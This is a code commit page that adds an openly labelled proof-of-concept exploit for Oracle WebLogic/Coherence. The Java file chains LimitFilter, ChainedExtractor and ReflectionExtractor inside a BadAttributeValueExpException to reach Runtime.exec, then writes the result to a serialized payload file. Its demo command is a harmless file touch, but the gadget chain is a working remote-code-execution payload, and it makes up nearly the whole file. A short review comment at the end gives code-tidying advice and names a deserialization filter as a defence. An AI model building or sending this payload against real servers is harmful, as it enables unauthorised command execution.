add PoC
parent
1851f4bc3c
commit
587fc0ff09
@ -0,0 +1,54 @@
import com.tangosol.util.filter.LimitFilter;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
/*
* BadAttributeValueExpException.readObject()
* com.tangosol.util.filter.LimitFilter.toString()
* com.tangosol.util.extractor.ChainedExtractor.extract()
* com.tangosol.util.extractor.ReflectionExtractor.extract()
* Method.invoke()
* Runtime.exec()
*
* PoC by Y4er
*/
public class Weblogic_2555
{
public static void main(String args[]) throws Exception
{
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
LimitFilter limitFilter = new LimitFilter();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExt);
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, limitFilter);
// Serialize object & save to file
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(badAttributeValueExpException);
os.close();
}
}
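Review bot: The two streams opened at the end of `main` are closed only on the success path, so an exception from `writeObject` leaves `payload_obj.ser` open and possibly truncated; the last four statements read better as `try (ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("payload_obj.ser"))) { os.writeObject(badAttributeValueExpException); }`. `java.io.FileInputStream` and `java.io.ObjectInputStream` are imported but never used anywhere in the file and can be dropped. The header comment lists the call chain but not which advisory or fixed release it corresponds to, so a line such as `* Reference: <advisory id>, fixed in <release>` (neither value is shown on this page) would let a reader map the file to a patch level. It would also help to say in that comment that the chain only starts when a target performs native Java deserialization of untrusted bytes, which an `ObjectInputFilter` rejecting the `com.tangosol.util.extractor` classes should stop before `readObject()` reaches them.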
|
Loading…
Reference in New Issue